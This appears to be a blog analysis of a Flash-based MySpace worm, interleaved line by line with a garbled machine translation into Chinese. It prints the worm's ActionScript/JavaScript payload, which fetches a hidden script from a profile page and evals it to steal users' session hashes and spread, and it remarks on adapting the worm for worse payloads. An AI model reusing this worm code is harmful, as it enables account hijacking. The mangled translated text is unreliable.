MySpace has been infected by Flash based (swf) worm which spreading rapidly through MySpace. MySpace上已感染病毒由Flash为基础的(瑞士法郎)蠕虫病毒迅速蔓延,其中通过MySpace上。 It is embedding JavaScript code into users’ profiles that redirects visitors to a site claiming the US government was behind the 9/11 terrorist attacks, Symantec这是嵌入JavaScript代码到用户的个人资料重定向访客到网站声称美国政府的背后9 / 11恐怖袭击事件,赛门铁克 warned警告 Monday.星期一。 However it may be just the tip of the iceberg.但它可能只是冰山的一角。 Let’s take a look at how it works to understand how it can be easily modified to deliver much devastating payloads.下面我们来看一看究竟是如何办到的工程,以了解如何可以很方便地进行修改,以提供更毁灭性的有效载荷。

The unnamed worm isn’t malicious but the Shockwave Flash (.swf) file containing the payload embeds JavaScript into the profile of any MySpace user who views the .swf file.未命名蠕虫并非恶意,但的Shockwave Flash ( 。瑞士法郎)文件,其中包含有效载荷的JavaScript嵌入到个人资料的任何MySpace上的用户谁的意见。 SWF文件。 This can easily replicate这可以很容易复制 Samy is my friend德萨米是我的朋友 worm without breaking a sweat.蠕虫没有打破了汗水。

This javascript code would then be interpreted by any user who visited the site, allowing sensitive data to be stolen, such as a hash value required to carry out operations as a user, and performing operations on behalf of that users (without consent obviously).这个JavaScript代码,然后加以解释谁在没有任何用户访问该网站,让敏感的数据,被盗,例如作为一个哈希值,须进行业务作为一个用户,并表演行动就代表该用户(未经同意,显然) 。 Currently, that access is being used only to spread the JavaScript code to other profiles on the popular social network site.目前,进入正在只能用来传播的JavaScript代码到其他配置文件热门的社会网络网站。

If the payload is malicious, it can carry out secondary attacks like targeting recently discovered vulnerabilities affecting Microsoft Office content.如果是恶意的有效载荷,可以进行二次攻击一样,针对最近发现的漏洞影响Microsoft Office的内容。 The impact would be much higher exposing even sensitive information on your hard-disk.影响将高得多,揭露,甚至敏感的资料,在您的硬盘。

Let’s take a look at the worm, thanks to research by下面我们来看一看在蠕虫,感谢研究 kinematic.theory :

When you visited an already infected page, there is a Flash object embedded (”redirect.swf”) which contains the actionscript:当您参观了已经感染的网页上,有一个闪光的对象嵌入式( “ redirect.swf ” ) ,其中包含的ActionScript :
getURL(" geturl ( “ url 网址 “); “ ) ;

It opens and redirects you to the specified blog URL.开放时间和您重定向到指定的博客地址。

On this blog url there is another flash file embedded - “retrievecookie.swf”.关于这个博客网址,还有一个嵌入式的Flash文件-“ r etrievecookie.swf” 。 It contains:它包含:

getURL("javas\n\rcript: var x = new ActiveXObject(\'Msxml2.XMLHTTP\');x.open(\'GET\',\'http://editprofile.myspace.com/index.cfm?fuseaction=user.HomeComments&friendID=93634373\',true);x.onreadystatechange=function(){if (x.readyState==4){var pg=x.responseText;var sc=pg.substring(pg.indexOf(\'BX-\')+3,pg.indexOf(\'-EX\'));while((sc.indexOf(\' geturl ( “ javas \ n \ rcript如下: var x =新activexobject ( \ ' msxml2.xmlhttp \ ' ) ; x.open ( \ '获得\ ' , \ ' http://editprofile.myspace.com/index.cfm ? fuseaction = user.homecomments & friendid = 93634373 \ ' ,真正的) ; x.onreadystatechange =函数( ) (如果( x.readystate == 4 ) (无功pg = x.responsetext ;无功资深大律师= pg.substring ( pg.indexof ( \ ' bx - \ ' ) 3 , pg.indexof ( \ '当然\ ' ) ) ;而( ( sc.indexof ( \ '
\’)!=-1)||(sc.indexOf(\’-XXX\’)!=-1)){var n=sc.indexOf(\’ \ ')!=- 1 ) | | ( sc.indexof ( \ ' -三十\ ')!=- 1 ) ) (无功每组sc.indexof ( \ '
\’);if(n==-1)n=sc.indexOf(\’-XXX\’);sc=sc.substring(0,n)+sc.substring(n+5,sc.length);};” + “eval(sc);}};” + “x.send(null);”, “”); \ ' ) ;如果( ==- 1 )每组sc.indexof ( \ ' -三十\ ' ) ;资深大律师= sc.substring ( 0 , N )基金+ sc.substring (五, sc.length ) ; ) ; “ + ” eval资深大律师);}};" + “ x.send (空; ” , “ ” ) ;

It opens another blog post (开放的另一个博客帖子( link链接 ) and evaluates its contents. ) ,并评估其内容。

This code gets your MySpace hash which allows anyone to act as you on MySpace and perform any operations on your behalf like changing your password or adding someone unknown as your friend, anything you can do on MySpace.此代码得到您的MySpace上的散列,使任何人采取行动,正如你在MySpace和执行任何行动就代表你想改变您的密码或某人加入未知作为您的朋友,什么都可以在MySpace上。 Currently the code adds a message to your MySpace profile.目前代码添加邮件到您的MySpace上的个人资料。 It extensively use AJAX for its operations.它广泛地使用AJAX技术为其业务。